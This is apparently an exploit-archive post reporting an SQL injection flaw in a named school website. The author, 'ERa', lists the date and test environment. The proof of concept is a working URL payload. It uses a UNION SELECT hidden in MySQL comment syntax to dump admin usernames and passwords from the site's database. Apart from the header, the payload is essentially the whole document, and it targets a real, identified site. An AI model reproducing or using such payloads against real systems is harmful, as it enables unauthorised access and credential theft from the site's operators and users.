-------------------------------------------------------------* #Exploit Title: gurusaipoly- SQL Injection vulnerability #Date: 2020-09-27 #Exploit Author: ERa #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Demo : https://gurusaipoly.com/teacher.php?id=-4%27%20/*!50000unIon*/%20/*!50000sElect*/%201,2,3,4,5,6,/*!50000unHex(hEx(gRoup_concAt(name,%27:%27,password)))*/%20/*!50000frOm*/%20admin%20--+ -------------------------------------------------------------* #Discovered by: ERa #Email: era_reborn@yahoo.com -------------------------------------------------------------*